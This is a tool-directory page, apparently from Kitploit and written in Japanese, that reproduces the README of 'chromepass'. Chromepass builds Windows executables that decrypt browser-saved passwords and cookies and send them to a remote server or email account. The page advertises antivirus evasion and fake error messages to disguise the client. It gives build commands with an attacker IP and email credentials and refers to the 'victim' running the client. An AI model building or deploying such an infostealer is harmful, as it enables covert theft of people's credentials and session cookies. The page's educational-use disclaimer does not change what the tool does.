Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
chromepass — Chromepass - Chromeに保存されたパスワードをハッキング | Kitploit
ツール/GitHubGitHub/darkarp/chromepass
パスワードクラッキングデータ流出フィッシングレッドチーミング
GitHubdarkarp/chromepass

chromepass

Chromepass - Chromeに保存されたパスワードをハッキング

リポジトリを見る
8381114年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Chromepass - Chrome保存パスワードとCookieのハッキング

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

デモを見る · バグを報告 · 機能リクエスト

目次

  • プロジェクトについて
    • AV検出
  • はじめに
    • 依存関係と要件
    • インストール
  • 使い方
  • メール
  • エラー、バグ、機能リクエスト
  • 詳細情報
  • ライセンス
  • デモ

プロジェクトについて

ChromepassはPythonベースのコンソールアプリケーションで、以下の機能を持つWindows実行可能ファイルを生成します。

  • Google Chrome, Chromium, Edge, Brave, Opera, Vivaldiの保存されたパスワードとCookieを復号化
  • ログイン/パスワードの組み合わせとCookieを含むファイルをリモートで送信(HTTPサーバーまたはメール)
  • 正しく行えばAVに検出されない
  • カスタムアイコン
  • カスタムエラーメッセージ
  • ポートのカスタマイズ

AV検出!

新しいクライアントビルド手法により、AV回避戦術を使わなくても実質的に検出率0%が保証されます。将来的にこれが成立しなくなった場合、AV回避を改善するためのいくつかの方法が実装される予定です。

直近のスキャン例(注:10〜12時間以内に0〜2件の検出から32件の検出に増加するため、自身のビルドで分析を実行してください):

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

はじめに

依存関係と要件

これは非常にシンプルなアプリケーションで、次のものだけを使用します:

  • Python - Python 3.9+でテスト済み

インストールはWindows VM内で実行することを推奨します。インストール手順の一部は既存の設定の影響を受ける可能性があります。これはクリーンなWindows 10 VMでテストされています。

インストール

ChromepassのコンパイルにはWindowsが必要です!LinuxとmacOSのサポートは近日追加予定です。

リポジトリのクローン:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

注:リポジトリのクローンに代えて、最新リリースをダウンロードすることもできます。リポジトリはバグが多い可能性があります。

依存関係のインストール:

依存関係は自動的に確認されインストールされるため、使い方にスキップして構いません。競合がないことを確認するために、クリーンなVMを使用することを推奨します。

依存関係がなくインターネットが遅い場合、時間がかかります。コーヒーでも飲んでお待ちください。


使い方

Chromepassは非常に簡単です。まず次のコマンドを実行します:

root@kitploit:~
python create.py -h

オプションのリストが表示され、説明は一目瞭然です。

パラメータなしで実行すると、127.0.0.1に接続するサーバーとクライアントがビルドされます。

ビルドの簡単な例:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

サーバーとクライアントを作成したら、クライアント実行時にサーバーが実行されていることを確認してください。

Cookieとパスワードは、サーバーと同じディレクトリにあるdataという新しいフォルダに、IPアドレスごとに分けられたjsonファイルとして保存されます。


メール

Chromepassは実験的ではありますが、メール経由でのファイル送信をサポートしています。これを有効にするには、サーバー作成時に--emailフラグを使用します。必要なものは2つ:ユーザー名(メールアドレス)とパスワード(アプリパスワード)です。

アプリパスワードを生成するには、アカウント設定 -> セキュリティに進み、2段階認証を有効にする必要があります(必須!)

2段階認証を有効にすると、アプリパスワードという新しいオプションが表示されます: 2-step-authentication

生成をクリックすると、必要なパスワードが表示されます。 2-step-authentication

ユーザー名とパスワードはコマンドで直接使用するか、config.iniファイル内のYOUR_USERNAME、YOUR_PASSWORDと書かれた場所に記述することもできます。

コマンド内に認証情報を指定する例

root@kitploit:~
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

認証情報を設定ファイルに記述する場合(このファイルを開けば場所がわかります)

root@kitploit:~
python create.py --error --message 'An Error has happened' --email

リモートに関する注意

リモートで使用する場合は、ポートフォワーディング(デフォルトはポート80)も行う必要があります。これにより、被害者がクライアントを実行したときに、正しいポートでサーバーに接続できるようになります。
一般的な情報については、こちらをクリックしてください。それでも不十分な場合は、Google検索を行ってください。


手動依存関係インストール

自動セットアップは実験的です。何らかの理由で正しく依存関係をインストールできない場合があります。その場合は手動でインストールする必要があります。
幸いなことに、依存関係は2つだけです:

  • Microsoft Visual C++ Build Tools(推奨されるワークフローでインストール)
  • Rustup

ビルドツールの代わりにVisual Studioをインストールすることもできますが、より多くの容量を必要とします。

ビルドツールのインストールが成功したら、Rustupのウェブサイトからrustup-init.exeを実行するだけです。

これで必要な依存関係のインストールが完了し、すぐに使用できるはずです。


エラー、バグ、機能リクエスト

エラーやバグを見つけた場合は、Issueとして報告してください。機能や改善を提案したい場合は、Issueページで報告してください。

Issue作成時に表示されるテンプレートに従ってください。


詳細情報

完全な初心者から熟練のベテランまで、意欲的なコンピュータセキュリティの専門家で構成されるコミュニティに参加するには、Discordサーバーに参加してください:WhiteHat Hacking

連絡を取りたい場合は、次のメールアドレスから連絡できます:[email protected]


免責事項

提供された情報とコードを使用して行うことについて、私は一切の責任を負いません。これは専門的または教育的目的のためのみに意図されています。

ライセンス

AGPL-3.0


Code Intelligence Status

デモ

til

ツールをダウンロード